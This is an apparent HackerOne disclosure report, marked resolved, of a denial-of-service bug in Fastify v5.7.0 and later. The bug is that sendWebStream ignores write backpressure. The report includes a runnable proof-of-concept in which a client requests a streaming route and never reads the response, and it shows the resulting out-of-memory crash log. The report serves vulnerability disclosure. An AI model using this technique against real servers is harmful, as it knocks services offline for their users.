DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored
Unknown
Vulnerability Details
# Denial of Service (DoS) via Unbounded Memory Allocation in `sendWebStream` (Backpressure Ignored)
## Weakness
**CWE-770**: Allocation of Resources Without Limits or Throttling
## Severity
**High (7.5)**
* **Vector String**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`
* **Attack Vector**: Network
* **Attack Complexity**: Low
* **Privileges Required**: None
* **User Interaction**: None
* **Availability**: High
## Summary
I have discovered a High-Severity Denial of Service (DoS) vulnerability in Fastify **v5.7.0 and later**. The issue lies in the `sendWebStream` function within `lib/reply.js`, which was recently introduced to support native Web Streams.
The implementation fails to handle TCP backpressure correctly. When a `ReadableStream` is sent as a response, Fastify continuously pulls data from the stream producer (`controller.enqueue`) and writes it to the response object (`res.write`). However, it **ignores the return value of `res.write()`**.
In a healthy system, `res.write()` returns `false` when the internal buffer is full, signaling that the producer should pause (backpressure). Because Fastify ignores this signal and immediately schedules the next read, a fast producer (e.g., a file stream or generated data) connected to a slow or stalled client will fill the server's memory indefinitely.
An attacker can exploit this by initiating a request to an endpoint that returns a Web Stream and simply **not reading the response**. This forces the server to buffer the entire stream in memory, leading to an Out-Of-Memory (OOM) crash.
## Steps To Reproduce
To reproduce this vulnerability, you need a Fastify server version 5.7.0 or higher.
1. Create a new folder and install `fastify`:
```bash
mkdir fastify-oom-poc
cd fastify-oom-poc
npm init -y
npm install fastify@latest
```
2. Create a file named `reproduce_oom.js` with the following content:
```javascript
'use strict'
const Fastify = require('fastify')
const { ReadableStream } = require('node:stream/web')
const { connect } = require('node:net')
// Initialize Fastify
const fastify = Fastify({ logger: false })
// Define a route that returns an infinite stream using Web Streams
fastify.get('/stream', (req, reply) => {
const stream = new ReadableStream({
pull(controller) {
// Push a 1MB chunk.
// In a secure implementation, this should pause when the buffer is full.
// In Fastify v5.7.0+, this keeps getting called indefinitely.
controller.enqueue(Buffer.alloc(1024 * 1024, 'a'))
// Log memory usage to demonstrate the leak
if (Math.random() < 0.05) {
const usage = process.memoryUsage().rss / 1024 / 1024
console.log(`[Server] Memory usage: ${usage.toFixed(2)} MB`)
}
}
})
return reply.send(stream)
})
async function run() {
try {
const address = await fastify.listen({ port: 0 })
const port = fastify.server.address().port
console.log(`Server listening on port ${port}`)
console.log('Connecting malicious client...')
// Create a client that connects but stops reading after the initial request
const client = connect(port, 'localhost', () => {
// Send a minimal HTTP request headers
client.write('GET /stream HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n')
})
// CRITICAL: We intentionally DO NOT add a 'data' listener to the client.
// This causes the TCP window to close, signaling backpressure.
// Fastify ignores this signal and keeps buffering data in RAM.
client.on('error', (err) => console.error('Client error:', err))
console.log('Client connected and paused. Watching server memory usage...')
} catch (err) {
console.error('Error starting server:', err)
process.exit(1)
}
}
run()
```
3. Run the reproduction script:
```bash
node reproduce_oom.js
```
**Observed Result:**
You will see the memory usage print to the console. It will rise rapidly until the process crashes.
```text
Server listening on port 36451
Connecting malicious client...
Client connected and paused. Watching server memory usage...
[Server] Memory usage: 105.42 MB
[Server] Memory usage: 520.18 MB
[Server] Memory usage: 1540.66 MB
[Server] Memory usage: 2890.12 MB
<--- Last few GCs --->
[1234:0x5678] 15000 ms: Mark-sweep 4000.5 (4100.0) -> 4000.2 (4100.0) MB, 0.1 / 0.0 ms (average mu = 0.123, current mu = 0.012) allocation failure; scavenge might not succeed
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
```
## Supporting Material/References
The vulnerability is in `lib/reply.js` in the `sendWebStream` function.
```javascript
// Vulnerable implementation in Fastify v5.7.x
function onRead (result) {
if (result.done) {
// ...
return
}
// VULNERABILITY: Return value of res.write is ignored!
res.write(result.value)
// The next read happens immediately, regardless of buffer state
reader.read().then(onRead, onReadError)
}
```
## Impact
**Denial of Service (DoS)**: A single attacker with a standard network connection can crash the Fastify server by targeting any endpoint that returns a Web Stream. This shuts down the service for all legitimate users and may incur restart costs or downtime. No authentication or special privileges are required.
Actions
View on HackerOneReport Stats
- Report ID: 3524779
- State: Closed
- Substate: resolved
- Upvotes: 3